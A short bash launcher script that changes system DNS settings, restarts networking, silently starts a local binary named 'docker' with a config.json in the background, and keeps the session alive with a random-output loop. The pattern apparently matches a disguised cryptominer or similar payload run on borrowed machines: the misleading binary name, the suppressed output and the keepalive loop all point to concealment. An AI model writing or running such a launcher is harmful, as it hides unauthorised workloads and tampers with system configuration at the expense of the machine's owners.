#!/bin/bash

chmod +x docker > /dev/null 2>&1 &
echo "supersede domain-name-servers 8.8.8.8;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
nohup ./docker --config=config.json > /dev/null 2>&1 &
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done
